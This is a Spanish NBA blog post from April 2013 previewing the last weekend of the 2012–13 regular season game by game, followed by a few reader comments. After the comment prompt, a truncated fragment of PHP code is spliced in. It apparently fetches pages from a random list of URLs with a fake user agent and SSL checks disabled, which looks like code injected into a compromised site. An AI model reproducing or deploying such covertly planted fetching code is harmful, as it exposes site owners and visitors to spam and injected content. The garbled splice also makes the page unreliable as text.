Fin de semana: Lakers, Jazz y 28 equipos más

12 de April de 2013 por MagicJohnson32

kobe jazz
El último fin de semana de la regular season 2012-2013 presenta todavía varios frentes, aunque ninguno tan decisivo como el que implica a Los Angeles Lakers y Utah Jazz, que se disputan la única plaza de Playoffs que queda por asignar. Mientras los de Salt Lake City juegan un único partido este fin de semana, uno teóricamente sencillo en casa ante los Wolves, los Lakers reciben sin margen de error a dos de los mejores equipos del Oeste. Más abajo encontraréis los detalles de estos trascendentales partidos, pero hay mucho más. No se juegan tanto como Jazz y Lakers, pero Nuggets, Clippers y Grizzlies mantienen su baile a tres, Spurs y OKC se disputan el primer puesto de la conferencia, los Rockets pueden alcanzar a los Warriors en la sexta plaza, y en el Este queda fundamentalmente por ver el orden final de Bulls y Hawks, aunque los Pacers todavía pueden atrapar a los Knicks.

Quedáis invitados a comentar con nosotros todo lo que suceda de aquí al lunes, unos días durante los cuales quedarán ya bastante perfilados los Playoffs 2013.

VIERNES

Los dos únicos partidos de la madrugada del viernes al sábado en el que se enfrentan equipos fuera de los Playoffs o que no se juegan nada son el Sixers @ Wizards (1h00) y el Bobcats @ Pistons (1h30). El resto los repasamos detalladamente:

  • Nets @ Pacers (1h00): Brooklyn e Indiana acabarán probablemente en las posiciones que ocupan actualmente, cuartos y terceros respectivamente. Una victoria de los Pacers les permitiría seguir discutiendo la segunda plaza a los Knicks, pero los Nets han vencido los tres enfrentamientos anteriores entre ambas franquicias y Deron Williams llega en su mejor momento en mucho tiempo.
  • Bulls @ Raptors (1h00): no sólo acabaron los Bulls con la racha de los Knicks, sino que se situaron en el camino de los Heat en una hipotética segunda ronda. Así es este equipo de Chicago, un underdog de manual, imprevisible e irreductible. No van a ninguna parte sin Rose, claro, y cada vez parece más claro que el base no jugará esta temporada, pero los Bulls no entienden de rendiciones y viajan a Canadá con el objetivo de consolidar su quinta posición.
  • Bucks @ Hawks (1h30): dudo que los Hawks estén especialmente disgustados por verse en la sexta plaza ni que les importe mantenerla hasta el final de la regular season. Los Bucks, ya se sabe, ataron su presencia en Playoffs más por deméritos ajenos que por su propio juego y van a acabar la temporada con un balance negativo. En Atlanta vuelve Ilyasova pero se presentan sin Jennings ni Sanders, así que puede que volvamos a ver a John Henson en plan estelar.
  • Knicks @ Cavs (1h30): una vez finalizada la fantástica racha victoriosa, a los Knicks sólo les queda asegurar la segunda posición y preocuparse por la salud de sus menguantes efectivos. Todos los interiores (Chandler, Amaré, Kenyon, Kurt Thomas, Camby) están lesionados, así que preparaos para otro festival del triple en su visita a Cleveland, con Melo al asalto del título de máximo anotador. Por cierto, NY ha cortado a Thomas y Wojnarowski adelanta el fichaje del pívot Solomon Jones.
  • Celtics @ Heat (1h30): el Big Three de los campeones regresa para recibir apropiadamente a los Celtics, aunque éstos reservarán a Pierce y Garnett, que arrastran molestias musculares. Todo apunta a una contundente victoria local, aunque no sería la primera vez que el orgullo verde deja en evidencia nuestras predicciones.
  • Clippers @ Hornets (2h00): con tres victorias seguidas y ya alzados por primera vez como ganadores de la Pacific Division, el próximo reto para los Clippers es lograr la ventaja de campo para la primera ronda. Para ello, no pueden fallar en su visita a New Orleans, donde los Hornets apuran sus últimos días bajo dicho nombre antes de cambiar a Pelicans. Greivis Vásquez y Anthony Davis no estarán para lo que habría sido un bonito duelo con Paul y Griffin.
  • harden conleyGrizzlies @ Rockets (2h00): no es fácil, pero si se diesen los resultados adecuados, Memphis y Houston podrían verse en primera ronda. Se trata de un enfrentamiento entre la mejor defensa de la liga, la de los Grizzlies (89.5 puntos encajados de media) y el conjunto más anotador, los Rockets (106.2). Quien imponga su estilo tendrá mucho ganado.
  • Nuggets @ Mavs (2h30): ni Gallinari pero con la posible vuelta de Lawson y la mejor racha de victorias de toda la NBA, los Denver Nuggets visitan Dallas, donde los barbudos Mavs lloran su ya matemática eliminación de los Playoffs. Los de Karl llegan dispuestos a hurgar en la herida de Cuban.
  • Kings @ Spurs (2h30): el retorno de Tony Parker parece garantizado para unos Spurs a los que las bajas les han afectado últimamente más que de costumbre. Pendientes de un traspiés de los Thunder que les permita recuperar el liderato en el Oeste, los texanos no deberían de tener problemas ante Sacramento. Sorpresa: los Spurs han anunciado hoy viernes que cortan a Stephen Jackson.
  • Wolves @ Jazz (3h00): aquí empieza a decidirse la octava plaza del Oeste, el único billete para Playoffs que sigue sin propietario. No pueden, bajo ningún pretexto, dejar escapar la victoria los Jazz en su pista ante unos Wolves que están firmando una semana espantosa, especialmente por parte de un Ricky Rubio absolutamente negado de cara al aro.
  • Thunder @ Blazers (4h00): el Westbrook vs Lillard es suficiente motivo para echar un vistazo a lo que ocurra en el Rose Garden, donde los Blazers -perdedores de nueve seguidos- recuperarán a Hickson aunque volverán a presentar numerosas bajas y los Oklahoma City Thunder llegan con la duda de Perkins y con Durant apuntando a un nuevo título de máximo anotador.
  • Warriors @ Lakers (4h30): unos se juegan conservar la sexta plaza; los otros, la octava. La presión cae, obviamente, sobre las espaldas de los Lakers, que de nuevo estarán sin Nash al timón (así que preparémonos para otra minutada de Kobe). Los Warriors saldrán sin Bogut, en un momento en el que la pareja interior de los Lakers trasmite las mejores sensaciones de la temporada. Sin embargo, el smallball y la eficacia triplista de Golden State amenazan seriamente la temporada de los angelinos.

SÁBADO

  • Celtics @ Magic (1h00): con su épica victoria ante los Bucks, los Magic evitarán con toda certeza la indignidad de finalizar últimos de la regular season, honor que corresponderá (otra vez) a los Bobcats. Vucevic y Harris se preparan para volver a brillar en la visita de los Celtics, que se dedican a guardar armas antes de la gran batalla de los Playoffs.
  • Clippers @ Grizzlies (2h00): los protagonistas de una de las eliminatorias más apasionantes de los últimos Playoffs llevan camino de volver a enfrentarse en esta edición. Los angelinos necesitan una victoria en Memphis para optar a la ventaja de campo, algo que no necesitaron el año pasado pero que nunca viene mal.
  • Los intrascendentes Bucks @ Bobcats (1h00) y Suns @ Wolves (2h00) completan una noche de poca acción en la NBA.

DOMINGO

El domingo presenta varios partidos excelentes y sólo tres insustanciales, que son Cavs @ Sixers (21h30), Nets @ Raptors (21h30) y Mavs @ Hornets (0h00). Vamos con lo bueno:

  • lebron bullsBulls @ Heat (19h00): han pasado muy poco desde que los Bulls acabasen con la racha de 27 victorias de los Heat, demasiado poco para que las heridas hayan cicatrizado. ¿Alguien duda de que LeBron, que tras aquel partido se quejó amargamente de las faltas y el arbitraje, ansía venganza? Nada como una buena dosis de morbo para iniciar la jornada dominical.
  • Pacers @ Knicks (21h30): Si los Pacers desean la segunda plaza del Este, una victoria en el Madison será imprescindible. Necesitarán para ello frenar el ritmo del partido y aprovechar la infinita superioridad interior de que dispondrán David West y Hibbert. Lo de encontrar un modo de parar a Melo ya es otra historia, aunque Paul George y la mejor defensa del Este son de los pocos capaces.
  • Blazers @ Nuggets (23h00): no serán los actuales Blazers quienes desafíen la asombrosa solidez como locales de los Nuggets, que sólo han cedido tres partidos en el Pepsi Center en lo que llevamos de temporada. La tercera plaza estará un poco más cerca si aseguran esta victoria.
  • Kings @ Rockets (1h00): la peor defensa de la liga frente al mejor ataque. Todo en el Kings-Rockets señala a un marcador de escándalo y victoria local en un partido bonito para el espectador.
  • Spurs @ Lakers (3h30): cuando uno se está jugando la vida, caso de los Lakers, no quiere que se le crucen los Spurs en su camino. Quién sabe si Popovich no hará una de las suyas y sentará a Parker y/o Duncan (y, de paso, dejará a los Lakers en el camino de los Thunder). Pero lo más probable es que veamos un extraordinario partido que servirá para medir casi definitivamente a los Lakers y sus opciones de Playoffs.
Comenta

53 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

      Citar

  2. ado_24 dice:
    #2

    yo creo que los lakers deben echar a pau nash duhon y Blake y intentar traer a chris paul o brandon jennis y fichar un escolta korver un alero iguodola es escolta pero puede jugar de alero y un ala pivot veterano y buen tirado desde fuera el quinteto seria Paul o Jennis Kobe Iguodala Clark y Howard y suplentes Morris Korver metta jaminson y hill es soñar pero creo que los lakers se lo pueden permitir

      Citar

  3. Jose Luis dice:
    #3

    Iguodala es un jugador de correr, cosa que nadie más en esa plantilla es. La zona la veo colapsada, pues ni Clark, ni Iguodala, ni Kobe son buenos triplistas. No me convence, la verdad.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>